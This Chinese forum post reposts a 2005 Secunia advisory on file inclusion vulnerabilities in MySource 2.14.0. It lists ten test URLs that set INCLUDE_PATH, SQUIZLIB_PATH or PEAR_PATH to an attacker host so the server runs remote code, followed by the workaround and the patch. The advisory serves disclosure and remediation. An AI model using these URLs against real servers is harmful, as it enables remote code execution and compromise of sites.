WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 1950查看
  • 0回复

主题

好友

1936

积分

金牌会员

发表于 2010-1-19 13:11:28 |显示全部楼层
受影响系统:
MySource MySource 2.14.0 RC2
MySource MySource 2.14.0
不受影响系统:
MySource MySource 2.14.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 15133

MySource是一款功能强大的内容发布和管理系统。

MySource中存在多个远程和本地文件包含漏洞,远程攻击者可能利用此漏洞在主机上执行任意命令。

由于没有正确的验证用户输入,攻击者可以从外部和本地资源包含进任意文件,或在用户浏览器中执行任意HTML和脚本代码。

<*来源:Secunia Research

链接:http://secunia.com/secunia_research/2005-51/advisory/
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://[host]/[file]?
http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://[host]/[file]?
http://[victim]/web/init_mysource.php?INCLUDE_PATH=http://[host]/[file]?
http://[victim]/pear/Net_Socket/Socket.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/HTTP_Request/Request.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail/Mail.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date/Span.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mimeDecode.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mime.php?PEAR_PATH=http://[host]/[file]?

建议:
--------------------------------------------------------------------------------
临时解决方法:

* 将"register_globals"设置为"Off",确保从web根目录移除了MySource安装。

厂商补丁:

MySource
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

MySource Upgrade mysource-2.14.2.tar.gz
http://mysource.squiz.net/__data/page/1015/mysource-2.14.2.tar.gz

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-2 23:00 , Processed in 0.060056 second(s), 16 queries .

返回顶部